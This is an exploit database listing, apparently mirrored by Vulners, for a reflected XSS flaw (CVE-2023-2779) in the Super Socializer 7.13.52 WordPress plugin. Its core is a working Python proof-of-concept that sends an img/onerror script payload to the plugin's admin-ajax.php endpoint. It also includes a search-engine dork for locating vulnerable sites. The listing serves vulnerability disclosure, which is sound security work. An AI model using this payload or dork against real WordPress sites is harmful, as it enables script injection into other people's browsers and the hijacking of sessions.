Lucene search

K

Super Socializer 7.13.52 - Reflected XSS

🗓️ 20 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 191 Views

Super Socializer 7.13.52 Reflected XSS vulnerability in WordPress plugi

Show more
Related
Code
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests

# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"

# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)

# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Jun 2023 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS36.1
EPSS0.004
SSVC
191
.json
Report